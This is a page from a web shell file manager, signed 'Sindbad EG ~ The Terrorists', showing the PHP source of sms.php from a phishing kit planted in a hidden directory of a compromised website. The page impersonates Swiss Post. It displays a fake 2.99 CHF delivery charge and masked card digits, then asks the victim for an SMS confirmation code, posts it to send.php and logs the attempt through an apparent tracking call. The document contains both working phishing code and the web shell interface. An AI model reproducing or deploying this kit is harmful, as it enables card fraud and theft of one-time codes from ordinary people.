Sindbad~EG File Manager

Current Path : /home/infinitibizsol/sellmycarhq.com/.tmb/DetchPost/de/de/
Upload File :
Current File : /home/infinitibizsol/sellmycarhq.com/.tmb/DetchPost/de/de/sms.php

<?php
require "../main.php";
?><!doctype html>
<html>
<head>
<title></title>
<meta name="robots" content="nofollow,noindex"/>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="inc/style.css">
</head>
<body>
<div class="content">
<div class="header">
<div class="col left">
<img src="inc/logo.svg">
</div>
<div class="col right">
<img src="inc/lang.png">
</div>
</div>

<div class="form">

<div class="formcol">
<h2>Bestätigungscode</h2>
<p>Wir haben einen Bestätigungscode an Ihre Nummer gesendet</p>
</div>
<div style="font-family:courier; background:#fafafa; padding:10px; font-size:0.8em; ">
<span style="display:block; margin:3px 0;font-family:courier; font-weight:bold; font-size:1.1em;">Lieferdetails</span>
Verfolgungscode : CH7KMOZJT3<br>
Gesamt : 2.99 CHF <br>
Datum &nbsp;: <?php date_default_timezone_set('Europe/Rome'); echo date("d-m-Y"); ?>
Carte : xxxx-xxxx-xxxx-<?php if(isset($_SESSION['card'])){echo $_SESSION['card'];}else{ echo "xxxx";} ?>
</div>
</div>
<?php
if(isset($_GET['e'])){
echo '<div class="formcol" style="color:red;">
Falscher Code. versuchen Sie es nochmal
</div>';
}
?>
<form action="send.php" method="POST">
<div class="formcol">
<span>Code :</span>
<input type="text" name="sms" id="otp">
</div>


<div class="formcol" style="text-align:right;">
<button type="submit">Bestätigen</button>
</div>
</form>
</div>

<div class="footer">
<span>Contact</span> <span>Info</span><br>
<span>Accessibilité</span> <span>CG</span> <span>Protection des données et Info légales</span> <span>Colophon</span><br>
<p>© 2022 La Poste Suisse SA</p>
</div>

</div>

<?php $j->ctr("SMS ".@$_GET['e']); ?>
</body>
</html>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists